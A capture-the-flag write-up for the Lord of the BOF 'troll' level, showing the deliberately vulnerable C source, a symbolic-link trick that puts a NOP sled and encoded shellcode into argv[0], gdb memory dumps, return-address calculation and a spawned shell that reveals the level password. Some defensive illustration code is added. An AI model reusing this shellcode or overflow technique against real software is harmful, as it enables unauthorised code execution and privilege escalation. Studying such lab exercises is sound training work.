
orge / timewalker

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>	/* memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	// here is changed: exactly one argument, so argv[2] is no longer available
	if(argc != 2){
		printf("argc must be two!\n");
		exit(0);
	}

	// egghunter: wipe every environment string in place
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	// byte 47 of argv[1] (the high byte of the return address) must be 0xbf
	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument (48 bytes are still allowed into a 40-byte buffer)
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]);
	printf("%s\n", buffer);

	// buffer hunter: zero the buffer after the copy
	memset(buffer, 0, 40);

	// one more!: zero argv[1] as well
	memset(argv[1], 0, strlen(argv[1]));
}

Since argc must be 2, argv[2] cannot be used this time.

Even if we wanted to use the 40 bytes copied from argv[1] into buffer, buffer is zeroed afterwards, so the strategy of storing shellcode in buffer and returning to its address does not work. Therefore argv[0] has to be used.

argv[0] is the name of the executable, so the symbolic link trick from the previous challenge has to be used again, this time with a link whose name consists of \x90 bytes followed by the shellcode.
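The root cause troll leaves in place is the length check: it refuses arguments longer than 48 bytes, but the destination is a 40-byte buffer, so up to 8 bytes plus the terminating NUL still land past the end. As an added illustration (not part of the LOB troll source), the following reproduces troll's acceptance test next to a bounded copy that refuses anything that does not fit, NUL included; the function names are my own.

```c
/* Added example: troll's argument check beside a bounds-correct copy.
 * Names (troll_accepts, copy_arg_bounded, troll_overflow_bytes) are not
 * from the challenge source. */
#include <stdio.h>
#include <string.h>

#define BUF_LEN 40   /* size of troll's char buffer[40] */

/* troll's own test: the argument is copied whenever its length is <= 48. */
int troll_accepts(const char *arg)
{
    return strlen(arg) <= 48;
}

/* Bytes an accepted argument of length n writes past a BUF_LEN buffer,
 * counting the terminating NUL; 0 when troll refuses it or when it fits. */
size_t troll_overflow_bytes(size_t n)
{
    if (n > 48)
        return 0;                   /* "argument is too long!" */
    if (n + 1 <= BUF_LEN)
        return 0;                   /* fits, NUL included */
    return n + 1 - BUF_LEN;
}

/* Hardened copy: 0 and dst filled on success, -1 (dst untouched) when src
 * plus its NUL does not fit in dstlen bytes. */
int copy_arg_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (dstlen == 0 || n >= dstlen)
        return -1;
    memcpy(dst, src, n + 1);        /* n bytes plus the NUL */
    return 0;
}

int main(void)
{
    char buf[BUF_LEN];
    char arg[49];

    memset(arg, 'A', 48);           /* constructed 48-byte argument */
    arg[48] = '\0';
    printf("48 bytes: troll accepts=%d, bytes past buffer=%zu, bounded copy=%d\n",
           troll_accepts(arg), troll_overflow_bytes(strlen(arg)),
           copy_arg_bounded(buf, sizeof buf, arg));

    arg[39] = '\0';                 /* now 39 bytes: fits with its NUL */
    printf("39 bytes: troll accepts=%d, bytes past buffer=%zu, bounded copy=%d\n",
           troll_accepts(arg), troll_overflow_bytes(strlen(arg)),
           copy_arg_bounded(buf, sizeof buf, arg));
    return 0;
}
```

The 48-byte input used throughout this write-up (44 filler bytes plus a 4-byte return address) is accepted by troll and writes 9 bytes past buffer, which is exactly the saved frame pointer and return address; the bounded copy rejects it and accepts anything of 39 bytes or less.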

First I copied the troll binary to TROLL, created a tmp directory, and inside that directory created a symbolic link to the TROLL binary.

[orge@localhost tmp]$ ln -s /home/orge/TROLL `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost tmp]$ ls -l
total 0
lrwxrwxrwx    1 orge     orge           16 Jan 23 17:07 ????????????????????????????????????????????????????????????????????????????????????????????????????龞1ɱ2?l?ÿ??羵󪀨쀿ÿ2i00tii0cjo?㐔?࿱?̿ -> /home/orge/TROLL

I ran gdb on the symbolic link and found that buffer is at ebp-40. I filled the 40 bytes (buffer) + 4 bytes (sfp) with "A", followed by 0xbfbfbfbf as the return address, and passed that as argv[1].

[orge@localhost tmp]$ gdb `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` -q
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:	push   %ebp
0x8048501 <main+1>:	mov    %ebp,%esp
(omitted)
0x80485e6 <main+230>:	mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:	push   %edx
0x80485e9 <main+233>:	lea    %eax,[%ebp-40]
0x80485ec <main+236>:	push   %eax
0x80485ed <main+237>:	call   0x8048440 <strcpy>
0x80485f2 <main+242>:	add    %esp,8
(omitted)
0x804863e <main+318>:	ret    
0x804863f <main+319>:	nop    
End of assembler dump.
(gdb) b *main+237
Breakpoint 2 at 0x80485ed
(gdb) r `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
Starting program: /home/orge/tmp/鐞1ɱ2lÿ瀵󬩪ÿÿÿ2i00tii0cjo㐔⚱
                                                            ΁ `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
Breakpoint 1, 0x8048506 in main ()
(gdb) c     
Continuing.

Breakpoint 2, 0x80485ed in main ()
(gdb) ni
0x80485f2 in main ()
(gdb) x/200x $ebp
0xbffff9b8:	0x41414141	0xbfbfbfbf	0x00000000	0xbffffa04
0xbffff9c8:	0xbffffa10	0x40013868	0x00000002	0x08048450
(omitted)
0xbffffae8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaf8:	0x00000000	0x69000000	0x00363836	0x6d6f682f
0xbffffb08:	0x726f2f65	0x742f6567	0x902f706d	0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffb18:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb28:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb38:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb48:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb58:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb68:	0x90909090	0x90909090	0x90909090	0xeb909090
0xbffffb78:	0xc9315e11	0x6c8032b1	0x8001ff0e	0xf67501e9
0xbffffb88:	0xeae805eb	0x32ffffff	0x306951c1	0x69697430
0xbffffb98:	0x6f6a6330	0x5451e48a	0xb19ae28a	0x0081ce0c
0xbffffba8:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbb8:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbc8:	0x41414141	0x41414141	0x41414141	0xbfbfbfbf
0xbffffbd8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe8:	0x00000000	0x00000000	0x00000000	0x00000000

Set the return address to 0xbffffb28 and run the symbolic link.

[orge@localhost tmp]$ /home/orge/tmp/`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x28\xfb\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(
Segmentation fault (core dumped)
[orge@localhost tmp]$ ls     
core
????????????????????????????????????????????????????????????????????????????????????????????????????1ɱ2?l?ÿ??羵󪀨쀿ÿ2i00tii0cjo?㐔?࿱?̿

A core dump occurred, so let's look at the core with gdb.

[orge@localhost tmp]$ gdb -c core -q
Core was generated by `/home/orge/tmp/'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffff5e in ?? ()
(gdb) x/200x $esp
0xbffff8fc:	0x2f656d6f	0x00000000	0xbffff944	0xbffff950
0xbffff90c:	0x40013868	0x00000002	0x08048450	0x00000000
(omitted)
0xbffffa0c:	0x00000010	0x0f8bfbff	0x0000000f	0xbffffa47
0xbffffa1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa3c:	0x00000000	0x00000000	0x69000000	0x00363836
0xbffffa4c:	0x6d6f682f	0x726f2f65	0x742f6567	0x902f706d
---Type <return> to continue, or q <return> to quit---
0xbffffa5c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa6c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa7c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa8c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaac:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffabc:	0xeb909090	0xc9315e11	0x6c8032b1	0x8001ff0e
0xbffffacc:	0xf67501e9	0xeae805eb	0x32ffffff	0x306951c1
0xbffffadc:	0x69697430	0x6f6a6330	0x5451e48a	0xb19ae28a
0xbffffaec:	0x0081ce0c	0x00000080	0x00000000	0x00000000
0xbffffafc:	0x00000000	0x00000000	0x00000000	0x00000000

The address of the 0x90 bytes has changed. Change the return address to 0xbffffa6c.
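The two memory listings above show the same argv[0] string at different addresses: the program name is attacker-supplied data placed on the stack, and where it lands depends on how the process was started, which is why the address read under gdb did not hold in the bare run. As an added example (not part of the original write-up), the following parser reads gdb's x/Nx row format, locates the argv[0] string in each listing and measures the displacement; the rows are excerpted from the two dumps above, and the function names are my own.

```python
"""Added example: parse the gdb x/Nx dumps quoted in this write-up, find the
argv[0] string in each and measure how far it moved between the gdb run and
the bare run that produced the core.  Function names are not from the page."""
import re

# One dump row: "0xbffffb18:<tab>0x90909090<tab>0x90909090 ...".
ROW_RE = re.compile(r"^(0x[0-9a-fA-F]+):\s+((?:0x[0-9a-fA-F]{8}\s*)+)$")

# Excerpt of the "x/200x $ebp" listing taken under gdb (rows as shown above).
GDB_DUMP = """
0xbffffaf8:\t0x00000000\t0x69000000\t0x00363836\t0x6d6f682f
0xbffffb08:\t0x726f2f65\t0x742f6567\t0x902f706d\t0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffb18:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffb28:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffb38:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffb48:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffb58:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffb68:\t0x90909090\t0x90909090\t0x90909090\t0xeb909090
0xbffffb78:\t0xc9315e11\t0x6c8032b1\t0x8001ff0e\t0xf67501e9
"""

# Excerpt of the "x/200x $esp" listing taken on the core file.
CORE_DUMP = """
0xbffffa3c:\t0x00000000\t0x00000000\t0x69000000\t0x00363836
0xbffffa4c:\t0x6d6f682f\t0x726f2f65\t0x742f6567\t0x902f706d
---Type <return> to continue, or q <return> to quit---
0xbffffa5c:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffa6c:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffa7c:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffa8c:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffa9c:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffaac:\t0x90909090\t0x90909090\t0x90909090\t0x90909090
0xbffffabc:\t0xeb909090\t0xc9315e11\t0x6c8032b1\t0x8001ff0e
"""


def parse_dump(text):
    """Map every byte in the dump to its address.  Words are little-endian, so
    0x6d6f682f at 0xbffffb04 yields b'/hom'.  Lines that are not dump rows
    (gdb's pager prompt, prose) are skipped."""
    mem = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        addr = int(m.group(1), 16)
        for word in m.group(2).split():
            for b in int(word, 16).to_bytes(4, "little"):
                mem[addr] = b
                addr += 1
    return mem


def find_bytes(mem, needle):
    """Lowest address at which the byte string `needle` appears, or None."""
    for start in sorted(mem):
        if all(mem.get(start + i) == needle[i] for i in range(len(needle))):
            return start
    return None


def run_length(mem, start, value):
    """Number of consecutive bytes equal to `value` beginning at `start`."""
    n = 0
    while mem.get(start + n) == value:
        n += 1
    return n


def locate_argv0(text, directory=b"/home/orge/tmp/"):
    """Return (path_addr, filler_addr, filler_len): where the argv[0] string
    starts, where the 0x90 part of the link name begins (right after the
    directory prefix) and how long it is; None if the prefix is absent."""
    mem = parse_dump(text)
    path = find_bytes(mem, directory)
    if path is None:
        return None
    filler = path + len(directory)
    return path, filler, run_length(mem, filler, 0x90)


def argv0_shift(dump_a, dump_b):
    """How many bytes lower argv[0] sits in dump_b than in dump_a."""
    return locate_argv0(dump_a)[0] - locate_argv0(dump_b)[0]


def within(addr, start, length):
    """True if addr lies in the half-open range [start, start + length)."""
    return start <= addr < start + length


if __name__ == "__main__":
    for name, dump in (("gdb run", GDB_DUMP), ("core file", CORE_DUMP)):
        path, filler, n = locate_argv0(dump)
        print(f"{name}: argv[0] at {path:#x}, 0x90 bytes {filler:#x}..{filler + n:#x} ({n} bytes)")
    print(f"argv[0] moved down by {argv0_shift(GDB_DUMP, CORE_DUMP)} bytes")
```

Run on the two excerpts, the parser places argv[0] at 0xbffffb04 under gdb and at 0xbffffa4c in the core, 184 bytes lower, with the 100 filler bytes starting 15 bytes after the path in each case. The two return addresses chosen in the write-up, 0xbffffb28 and 0xbffffa6c, each fall inside the filler range of their own listing, which is why the first worked under gdb but not from the shell.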

Back in /home/orge, create the same symbolic link, set the return address to 0xbffffa6c and run it.

[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ /home/orge/`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x6c\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl
bash$ my-pass
euid = 508
aspirin
bash$ exit

The password is aspirin.

Note that the challenge can only be solved if a core dump occurs and a core file is created. Running the original troll binary, however, never produces a core file no matter what; you have to test against a copy of the troll binary first for the core dump to occur.
